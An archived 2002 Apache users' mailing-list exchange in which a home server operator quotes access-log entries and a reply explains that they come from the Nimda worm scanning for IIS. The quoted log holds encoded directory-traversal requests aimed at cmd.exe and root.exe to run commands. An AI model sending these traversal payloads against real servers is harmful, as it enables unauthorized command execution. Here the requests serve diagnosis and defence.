httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Mike Hodson <m...@mystica.cx>
Subject Re: access log
Date Fri, 19 Apr 2002 10:36:07 GMT
These are the telltale symptoms of someone on the internet who has the
NIMDA internet worm, which thankfully only affects microsoft IIS users.
though having countless log entries from this crap undoubtedly affects
all of us, unix users included.

Odds are it is someone who uses the same ISP you do, but they either
have no clue it is on their systems, or have not yet run the latest
patches/virus scanners. Its not your problem, and its probably not
theirs either. I've had 170,000 log entries from NIMDA, and there are no
signs its even slowing down. :(


On Fri, 19 Apr 2002 10:43:04 +0200
"Robert Douglass" <r.douglass@onlinehome.de> wrote:

> Hello, I've been hosting a tiny website from my home for the past week, as a
> temporary project, and I found the following in my access log:
> 
> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 329
> "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 329
> "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 345
> "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> 
> Does anybody have an idea what someone was trying to accomplish with this,
> or if these requests may have originated from my ISP? Does anybody have any
> suggestions on how to implement some basic security (I've done nothing!) to
> protect myself? I'm using Apache 1.3.22. Thank you,
> 
> Robert Douglass
> 
> 
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org

-- 
Mike Hodson  <mike@mystica.cx>
IRC: irc.mystica.cx #mystica or /msg me if im not actively talking. 
ICQ: 18145059


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message